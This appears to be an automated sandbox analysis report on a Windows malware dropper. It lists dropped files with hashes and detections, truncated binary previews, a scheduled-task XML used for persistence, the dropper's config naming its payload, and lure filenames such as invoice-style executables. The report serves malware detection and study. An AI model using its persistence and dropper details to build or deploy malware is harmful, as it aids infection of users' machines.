Preview:	09JF78Fh11lv273Ap1ugc9E7cGuu3..2tytW281h9C2PDSeI1lY1EVqZU..507ie6QZ889TNk3B91If1328iy39Xs8Yu4S88983G2916P25eY6k752X8zW08k3c7g33330om0d37L35Ki2Q791T48aO6b0S1r5UmSzw918VUxlH60Zr0V707Ad9t3vq62A51379S3g48580g6Xz9dX4aV5G15sS2K6rV7808ztG2howf42lydQp65..c950bpN27Zd5x16608tZ2BYeT51aisEmMJQ54k32Gj86M586D777E11221Kf7158Ef4Q6n740t4nhsjplG8..aD9O2o33Z03ry292VH0774ndw15ng5Pt61O127kc2O329355b56q42871SI13YswAz..jbp0jJk58X149s095365Tn0141cAZ7Cn71W47HVKMG0HaC4zi624d777g5G3135G63Y69RE09g9s30f6QQaU9q720E54fBQ0787U21HouAz1Wc08P3S1Qh8218a06NW4iDN27AX7uE3FtliR53..

C:\Users\user\33920049\mmuiqlcvwo.pif Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	777456
Entropy (8bit):	6.353934532007735
Encrypted:	false
SSDEEP:
MD5:	8E699954F6B5D64683412CC560938507
SHA1:	8CA6708B0F158EACCE3AC28B23C23ED42C168C29
SHA-256:	C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
SHA-512:	13035106149C8D336189B4A6BDAF25E10AC0B027BAEA963B3EC66A815A572426B2E9485258447CF1362802A0F03A2AA257B276057590663161D9D55D5B737B02
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 27%, Browse Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: Import order764536.xlsx, Detection: malicious, Browse Filename: KRSEL0000056286.JPG.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O.........."..................d....... ....@..........................0............@...@.......@.........................T................................c................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................R..............@..@.reloc...u.......v...H..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\33920049\qhqulleu.mp3 Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57578
Entropy (8bit):	5.578086176536263
Encrypted:	false
SSDEEP:
MD5:	5DC5D3365BAE36FC41072D92D22F69CB
SHA1:	91CE48060DCCCC9806AFB9979A3A1759041036DF
SHA-256:	067820A70679BC812C16421E4F759533DD91D8124ED36966436601B1F2013C94
SHA-512:	CE2119181FCBDA7C1B08068F918C7282DEFC8AD951E129458BB75F6CC9EC4CA105482B5F4AAC4C16E425736FA45DA790D10B4ED9346A93B23B4F4F713A912A85
Malicious:	false
Preview:	h2p1f27k11D4928Yg10sp4yM45..N0ev22LGA972g7108t53666312NEQ936013H6IGyekvJ71615uI45076O1PbOp00bA59fZew2Q3uW74G1..k861Wl190Fi62..u038289Po5303Y375wD97P2t0nAp79EjMGK3wI35dT61673071a86A620afy8DJ870rVU48212I8s..ncD25Fb62q65jJ0HVPugF6Yl7X7Eh0i993D1glNppq17371g73bR49xhOC7w18T9St7n7t6VA38VV077l5NF92F1F..e6Q3NRFdkG1n39Rd6h73S234193I5DKK125k40h0YM8838N3299r82GUBMO1Yp3G90Iw45xJ7P33jr6f54rDuo3GVzlg63J..j8A8nb2007l654wnz1y587053Z98G2W3Xy9800UO800f..4cB15n61ea13513367yB73oJVg6c..hOi4T720885078n0fh5i8Y8C5b235f8Y0..6PQm64Yx0AR5VCwDF77jt5TP41949X26Q1Fz3uz6059s8U364jW51iZep4dp7084LpOw..O4o2V8ELjw7l8111mlDOskR3Z0b369z4P43g220128bCH43235sh72Oz2B11Mo4d..5UK7HGAHv664260sU7J31..bP98bUe5lC4453Km3AGjhGF1bb58Qzj6k6C834Tg95..d0j10z556j2bC471373U8o8HhEi5222I1q3lUt262J803vC24t5dl6Q30eK0i6r3nMO8F141JLXg8DHv2M7Zy3s24..P0rW6Eh4XgHS9F4n79T8oQL0T9v3p77qi5fX888Zy17T3o58OQ69L213E7..qotNsDVE53Sqb17Pa42ZY6v4125671zj5S75..F3o864Et7a6069dE60Or8qp064D78XaH4EjN46493QX7DoM0SGp0881..Jqd84A2MR57zhMr96439g32590wWg025KOo768L987y6883

C:\Users\user\33920049\sdstvfk.ico Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.3732701590754415
Encrypted:	false
SSDEEP:
MD5:	84DFE2A08AFBC32793395799841D38E4
SHA1:	1E040C2A1032335F15C39C60A01343A58889B5DC
SHA-256:	AC294F23A91818659CFC3210CB058D3D9C7DDA4EF9D4CD933269C8428DED3AC5
SHA-512:	9B6B65C14499CCEB0FE8276CF33CE9B92091A7D1EB2BE8DE4497F7B418B57B70675BCF706425630D9210DF7EB1328E443F4D2F08B0CBD088DA579EAF086CE915
Malicious:	false
Preview:	1I533y4o2432sC09mPm14467Qm6RA4L3630s7YE9op7c6b35odL61Lv..E7R51t4675ep5Ne6BiS0EVrm7941A62Qm50xJP378E4830gEMF779o28LuQ85658RPRC5z5wEd607f9x27tEx8D542xU8xPHPe3o67493w47..m68nw5a8Y8EbK695k64w59v32815nelJ8iD81512w56m456Tm7JwER87Xn4g743VO..b582271uI6v1889C253tZu7Eol9r48z96EP902UcK8N4..Q99p11T43P4U9DdHofE6n0V7E688JLM77fJ1Bg1A27hI37H0CG12nJJ3..413p6It95893mo4w0O5P62957LSuqhwb006fPI0t3i9DXt1bo8wtD7MR3Zx20865TV4zn64V2ka5cHZ8zR5w58476k94u9RWF7Qd8763KL041A54pJU3fP824dlbfzgRBtpQ919S269X77SNg4975u0z276n8mo584012t3Er88LRv7o02V667..

C:\Users\user\33920049\srslmbkgam.xml Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.5258847043058905
Encrypted:	false
SSDEEP:
MD5:	B98459F0500F47B7B583B0C519CCF3CB
SHA1:	5D8012DB878B3F72B7A5736525F587330F988A96
SHA-256:	E52F7062BE09E0B5653629D3E3738EF2B514BA971CFA25EED7BE051466EE0E26
SHA-512:	C136360F2444CBB26A4DC20B7BBE04F1040D2F796D75FCE5274F612DB869E4943C7687E7AC457C705C5925545641A891E7CE242BAA2E7A993F9849F891E8D465
Malicious:	false
Preview:	GfD67N14eP8m1bN0fj0735N5f7v16q74W0C6Fs1q9l0o69se079um04K990PHo534Wi01vo5283qCXNJn83jG8m82PO61d1Si516K91925Qj542034Q5iq89tsas25j3WopZ65477Z08bF8mg48O9..vt1Ml5Z9yNR2m04028522aBAD99a8yr110Y655K5F8pDBr8wVJzJN75b1SDb7p616j10G18saj8x2In7wu2as1zt28768OU69P21D0Fj47Hmo6CVCz7yog178I25q68238TZ45fm7CC96P323948b8S3zK6xxz3..Z1C6n3556UD4dEJN7n5ZM7Lwdk11258DL9xP2uHt9D13L0GJ2HLiuOP8CyF1o9pT652GHr51TTl..QH2YsYeY2I6vg9..0e664n6Q39X5cs61w0Tc6A1nb1RZETK43DtvyY7OA35S15SLXM722on443pD183T88lFNr3b..4n766KanwrN8GUh21b2lzn0G691JTqM0xOe72G67e681m9242JaaxmlQTr32R511..

C:\Users\user\33920049\suktleoxtu.msc Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	540
Entropy (8bit):	5.547551481633137
Encrypted:	false
SSDEEP:
MD5:	BA57AA240C24091DC77E1E2EF7A99C10
SHA1:	A013814DFDF3086EA88DBAA42D1D5269CE08DC0D
SHA-256:	619C6857EA9C69C098E3AC990BE2B99B25EC1A75821081EAD723C9EF6F718FB2
SHA-512:	498B2133DDF75BB946A763216E8E757E902F7E6AEF565DB689B02B0A02526455EADAD1C1642924E7A611537428CF2D79B8314A7A05E041963F4D9328C61C4168
Malicious:	false
Preview:	7UeM9q9Mw18la8h385V2TY2J67875Z415miZD33XVD0fWsExvLj56QAB58zX50n866r0NMz3B91j75lAXO7664KTr03P97iu5a0e3ok9m1x8129442b30jF..bs835342OD650H5VCHlYXK5D9q4G0c4r365k4T5w6089C5ltN642O88P45K4d94fZ5D25Dp2x..o19q50od04s7y9uAfLrQ16c56n1J1Hw8501Va8Yhh..S002hzAenP3Vw8fbX26XmO3..6G07391a8EW371DR721Be1RrMyP7..zW017Nt62Z9m63V1B3KU58U52U67FRZRp6954lN4m3AnMWKz1Td5XR317VBtmPA47Tq3bRI5u..5221XFy1Ly4z3KR5898U54vHI1590032Q0A5J6J004FlS7FiSyZ34Z2R229KecLYwHuYohCaJ0y41344EOEH12107gfpU3B3t655Y3noEi92m1g5..7Jom47612d63Ulao436XWsS378O888QuW2Rt11526Hn302bDdS067x9..

C:\Users\user\33920049\ujhg.cpl Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	535
Entropy (8bit):	5.501943056038449
Encrypted:	false
SSDEEP:
MD5:	5F2BBE62D3EB28228186CD6964305381
SHA1:	46E019DA6F7ECE17D7500B963C80FF076B3B449C
SHA-256:	68C1BA695059F1E975FA07FF00BF77FD3B6E56EA4940E9E4AB5F7AA0FA33416E
SHA-512:	2F5AD3C6E6602C9980C530CD9380FEAB3CCDF1C2D836174F25EBF30C924D08FB958235B27C016CF2A0EEC51BACF50DAC685546778B893567AE3B51A89BEE1A4B
Malicious:	false
Preview:	WYk9Z859egc932519..B1M893TLb60Wf52J8ek0NdwiS96mdZg2e6X3V4DQ2VK63x83ud6I7lI593y276RNF9f9Lyzof8xR7HQa..N5k36V5598E7m2Ge3sZnA1cR0X9A0840084Z4610jL3Y38ZtWkdx8W03CGX2C5p5bCy4992Eh6r93p9tim053v1KPOjlY6J2E9CscL2CD8J835FPZZD36tBAcE3r204118YY5Clk7718n8529957Y09Sge8gYEJO466L..dNXk7sz8P4O49..f4ipv3W5RpW67D3W2rRW97v75N2veXA2C..QZP0q13Qf5771nOH6Y1r324r4244134971S9137oajWV519gX83400I85a218uZUs279IFN96..p0HuyY80xR8V7v6lh90hHN4e7OL6jG745402303t23Cx738n2GQ52R69S8Y7Z8t874EBQYG4229Y250Du3vVQ587an210h4gko80F462F2cw4g49xM226E4k091W4092cauuq5zUZ0yDB..

C:\Users\user\33920049\vusklntwi.docx Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	554
Entropy (8bit):	5.451419215130869
Encrypted:	false
SSDEEP:
MD5:	9D55DE9BCF880293EFC22A6EDF63D727
SHA1:	91BFA94E624F6A6C9891922931A650F3BDF014AF
SHA-256:	2EF84FFD76915FDBBAF0CC328B1AD11F7F0967D295AC7077F68C44F2DA67B75F
SHA-512:	3303BDC222A120225D36B48C6DCB24388FEEB8BC90A5FC84D8174C9CE487645D9435B31482E5D64057B52727ACC5EAF782E4B07D74FC29B32314F361186DE9EE
Malicious:	false
Preview:	e970K3K6t9k2e7O15tdejT7Sn7Qq5APO42D5c8DI2fzf170P7dM5E3URj68949M63pB660308..0Z7nFeV2Aj4d45E50826tzsFsCPc95Od6GlD5568n52Zb572al7J0J26cMon4..1004c08I4Vc1vEb84a1O05D0929v1dyJ3UTASw95H4X6il2g5qExNde32LC..E0P9AHDhBC160i4up784p9oJ210L9q5n45q1RF31L6O980D51ll9l010621T69ldG2xIx78ffqsCFS45q91gZS85i6R3sQ98xCR66HW9wZ7auPo2e3s25g5u0d762507u00ziT24V..43093P76L72429500832170O89Tu2g375949v..35ln5As955lr0m8073125L228boRR8623c2y99W97zd3vCc5R1QLck4nPi7XsmTH354817AY25392CS00..2O56h1BS43V8xK7905G6Lk64Mye6SI830p8TLf13Z05oQ74oGN49D651WnZCp46aN8BMMTmKs7X02F635ZS4M07D48a0..

C:\Users\user\33920049\weqn.txt Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.441373794856656
Encrypted:	false
SSDEEP:
MD5:	E887844DDB3C6BC8C9BA7ABF0963B162
SHA1:	5B1955F3EC2985EDA50632650FB71150AD311794
SHA-256:	4E47AFF41CBC53A8C36A9F3446DB8EFCF8B4BADD7808F7B58D57BB6F4082CA1F
SHA-512:	5F856E4D003D5822FEC6CB2A4F633259073D3BDDA70C475449213247B69DB68429BBC487B6DEFB016984FDD539599C00AE54DC941E686A115DEB0C0FCF9ECB1B
Malicious:	false
Preview:	VP1g07wz1m0513k47YE8U851zGONd88Z5px79e2NjXh10s645JS0S7034NpbhvB09zFfF66h5aLQyJaVOBRC8o7088Q30uxsb08Isv0D613D0wC4965d63Y14Q2o583v3664v2229j11X027..7v8K42r01w7T5LN3Eni4i6qu0NZj30S7h84H7A2Gt11L26O6O56F46..2I83MCFHIt12qK028V141AxZ6HLD5..617284669S3o8669s4p4v1Q2ep4j9AK1r9pDaV797ADlp..oo6yHV670255r7sJjSt04Th4O644Q16Njs67OA8B1TtOmI0d5747bFL6kjm6765778jtU0t7415r545lqn3wx37Dxi53133N41dI9874v41iTD44XG51s8LxSg8Ce88X6y3752KC39Wf0Z54194yUS0t2H..cvFZz9g9J20eZ9JE2znZf8tT858064t3w9XN6Zj4S35083O428Yw76Ol5s916tP77o3b6O81798HR479p1132XHb30IfQk8Le07Emvxj8K8xE1065Sj1359Pk..

C:\Users\user\33920049\wsxedltsm.cpl Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.5485404237595715
Encrypted:	false
SSDEEP:
MD5:	CEE5E8C575EC77654A20CB99615CEBF6
SHA1:	D43519CD61E556D88080FF2640150B2BBE34AE7D
SHA-256:	2A4C2DF427A70334733E5CB06304BFF74499D6850AE736F82B06A52B0D850D61
SHA-512:	573E6B89DC25A143F133993435C60719439EF51409199F433DFD12E772A4222F2DF8EEBDC155A42C102C17440A88B37B20F7BE698F368E34B174F0BD490BA0E8
Malicious:	false
Preview:	j29pidJ632cP7m999gkKsD0j6ghShsM38o7044RP7Ry1v0D888gk5htmLu663YfJhO06X446m494rW5q430s25224nA5oW246424z99b4P9zAu4EB4mF235YE764yX91e592790Ihqq893Z..T4bA1h5yY30ud1Tvjy154Dt77m922w607kylHTt65zj3p157727D361go3W3H276..Ha90V8hLz4c9Jm20xp957FDjDbQU75K5e19I2uCiqYcYnRzxG4wtX12X9m81TN32tH6..DuZb30cne54764I51E6C03OC1H6Wm35D..9M9mH5E9u9CT4ag00JHrjP804Qj62h9IwODNBQ01ub8211o4Vpa5lZ32v243x3kv26V7Mz3CWF106X5Q081BU2P7HgUU670739762Iec6jkup5VgFT611hA0cSK3Qy01BYz720na9FGc25s3Rb059M87b2BalfPH0rH6PI0K6v2aBeT4R602716..t1r6T88039gP9D0FS64p9475N8TCSJ34RrJ7tylz1cN954P1I93Qi34418xA0bR3Q077B2S03nw5cXNvEV8997yp2S8l7K3Jv7Yjy9I..

C:\Users\user\33920049\xtax.log Download File
Process:	C:\Users\user\Desktop\YdACOWCggQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	518
Entropy (8bit):	5.459797846755074
Encrypted:	false
SSDEEP:
MD5:	32834BAFB3B1871301A6BA9BEF2C5687
SHA1:	786CD933E49C5657480DB1485B0609F8DFEC11CE
SHA-256:	DF899EAC1B5F6515CBDA8B816319FF0F89D7FF9E4FBDAEC52C75E1505105CD95
SHA-512:	A3864E623BA6AD918138D3BFA27F8F2E7AFC4F2005BA7DB655D1798CEBB5CAFDBF06D44929364CF363AEFD3F7B4AB48C37B75B3548CA711E5C6B3AB68CEC1714
Malicious:	false
Preview:	909r1Px20Vlvk4D76LUZf57A31de05v0R7709Vp87M5t3r167Gb1wF24F573H0MiBP1al6x1l5142F6Hki..69kqz2S7IQ32t2YP58S4P2OC88MxtyYLNV6Rcl39564b85881x2216800eMh1519wQ24OQxher8l87B64L8be02406Iq..9wzX9PTl5..16x766JTG2I2l13885Tm69G4R4301657a39p3R38YIaD898fExjk7U8LO516629613D115o6WiB6F6043kq7f6TphpsG6V83..425be6T7gC64b703lXA1W1E9338S3c64O3c0B487ut5dK2vq4Ev4P5ZbwzxY2v5z78mg2rj860fmFhB3Tu2Gbzmv..1D82sAGc954k747g6a8F88c76au6O4h93306DJgBe54Ik2SU8rfE2On356ZsD3i2517eg3F2Py9007Zh2Oab5LR8494p0h72G894zZ38FZPQ3F80D1D7Wzc3Vs9867t6mlLttd2e4w6..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\RegSvcs.exe Download File
Process:	C:\Users\user\33920049\mmuiqlcvwo.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	45152
Entropy (8bit):	6.149629800481177
Encrypted:	false
SSDEEP:
MD5:	2867A3817C9245F7CF518524DFD18F28
SHA1:	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
SHA-256:	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
SHA-512:	7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Swift copy.exe, Detection: malicious, Browse Filename: KRSEL0000056286.JPG.exe, Detection: malicious, Browse Filename: tT5M57z8XiwLwf5.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Suspicious.Win32.Save.a.7200.exe, Detection: malicious, Browse Filename: Purchase order.exe, Detection: malicious, Browse Filename: 21ITQXL080104122T7.exe, Detection: malicious, Browse Filename: COSCOSH SHANGHAI SHIP MANAGEMENT CO LTD.exe, Detection: malicious, Browse Filename: 319-7359-01#U00a0BL#U00a0DRAFT.exe, Detection: malicious, Browse Filename: HSBc20210216B1.exe, Detection: malicious, Browse Filename: BANK INFORMATION.exe, Detection: malicious, Browse Filename: PO.2100002.exe, Detection: malicious, Browse Filename: dorlla.exe, Detection: malicious, Browse Filename: dAkJsQr7A9.exe, Detection: malicious, Browse Filename: QT2021154 NCX Glasurit Rev.1.exe, Detection: malicious, Browse Filename: Order specification & Drawing_PDF.exe, Detection: malicious, Browse Filename: payment.exe, Detection: malicious, Browse Filename: SWIFT CODE.exe, Detection: malicious, Browse Filename: SWIFT CODE.exe, Detection: malicious, Browse Filename: TRANSFER REQUEST FORM.exe, Detection: malicious, Browse Filename: swift code.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\AppData\Local\Temp\tmpB828.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1311
Entropy (8bit):	5.120237537969728
Encrypted:	false
SSDEEP:
MD5:	9CC9B31561289BF47DDBEF114BE4B6FA
SHA1:	C901987D5F8BBAD7231B7EE4A65ADB93BB0F56A5
SHA-256:	984AA44429B06B17C290376A8D741A2DAE62FE6F38EEBBF434A0781230686097
SHA-512:	075F148FDD9187FDD6BA56D1CD3D81641FE8D8F9FBA903F98B307463B4BCDC77556B542CFD73C9BC2C34D364245D5B8080DE69DC968DE9070D44FE180741D4FC
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:
MD5:	76413EBF84A4F46D01F8C8CE608686D8
SHA1:	8B1633D1647DDB8EB542F3E046FA47C734A7CAA3
SHA-256:	0CE3B1E05B72CFCD8DE944495B2A4CF5EF3B10B99D6D0D998A3BE6A042287639
SHA-512:	0B9923CE31C74E61A831CCBD3E8C6B79FE78FF7627EABA940D04E00C28A06094EC68E5BC2AEE389854A843DBAC9BD30C74F9E589B861C2441BBDFD18E39E289E
Malicious:	true
Preview:	.~..{..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	48
Entropy (8bit):	4.556127542695029
Encrypted:	false
SSDEEP:
MD5:	71C86F4534ED6EA4C1E9A785F2EB0A92
SHA1:	D065F0540580FC2E0ACD365784FD5A60F8235829
SHA-256:	DBC475B81DC4AACF70235516B8FB463D4FB170C3E72E647C0BA2A30D3B9EC4E3
SHA-512:	6D97D624C0A2B3D3B8D51A4F2502B8874E59E29538AD0477F1DE32FEEDAE38890F68532B591EEF0FA0DB23CD4929890DB256ACB8E4B73F6F790BB11C13473688
Malicious:	false
Preview:	C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe

C:\Users\user\temp\qhqulleu.mp3 Download File
Process:	C:\Users\user\33920049\mmuiqlcvwo.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	5.071141961542051
Encrypted:	false
SSDEEP:
MD5:	E241BA8C7BF12A7128E7C0AD28348930
SHA1:	ACFC821D16BAB7535369917F41BB21ADA15E3BC0
SHA-256:	0B64183C8B6E30C78D7EB1997E3686A1CE832B3CB0092F09CA76BA5FD5EE0B9C
SHA-512:	26A78974A6794751B052B58EB01C3BF9030E1116050C24A86326E31F1F11E1289860AC915F055B13F29AF3D0BED1E73CE9C5EAFC1196DD1C9CACA9C2E5602376
Malicious:	false
Preview:	[S3tt!ng]..stpth=%userprofile%..Key=Windows element..Dir3ctory=33920049..ExE_c=mmuiqlcvwo.pif..

\Device\ConDrv Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	215
Entropy (8bit):	4.911407397013505
Encrypted:	false
SSDEEP:
MD5:	623152A30E4F18810EB8E046163DB399
SHA1:	5D640A976A0544E2DDA22E9DF362F455A05CFF2A
SHA-256:	4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
SHA-512:	1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
Malicious:	false
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.832162830296474
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	YdACOWCggQ.exe
File size:	1073384
MD5:	b866823e1f8f4a52376bd108c457dd78
SHA1:	fe99849ec27630463080445337798eeba8000a02
SHA256:	ebe1bb18a77cf0b34d3ad06919a9adfff2aa69cfafa5b96b670534b890e3e2a8
SHA512:	fd1732ca7dc310395581d835ea3df1e7ad664c75c9c7f68ba55c0b2e521383a0c8781b490f7cc05428d6e534b356a585bf11b57e57808cc37ea08dabf4a09e13
SSDEEP:	24576:rAOcZEhU3Pv6cxzVQ5WP1TKyENXWPI1sDx52gWbh9dlfQ:tEicRPwZ1sDxIrtG
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	b491b4ecd336fb5b

Static PE Info

General
Entrypoint:	0x41e1f9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FE558994C1Fh
jmp 00007FE558994613h
cmp ecx, dword ptr [0043D668h]
jne 00007FE558994785h
ret
jmp 00007FE558994D95h
ret
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00433068h
mov dword ptr [ecx], 00434284h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE558987B91h
mov dword ptr [esi], 00434290h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00434298h
mov dword ptr [ecx], 00434290h
ret
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00434278h
push eax
call 00007FE55899792Dh
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 00434278h
push eax
call 00007FE558997916h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FE55899478Ch
push 0000000Ch
push esi
call 00007FE558993D4Fh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE5589946EEh
push 0043A410h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE558997015h
int3
push ebp
mov ebp, esp
sub esp, 0Ch

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[EXP] VS2015 UPD3.1 build 24215
[LNK] VS2015 UPD3.1 build 24215
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3b540	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b574	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x4c28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x67000	0x210c	.reloc
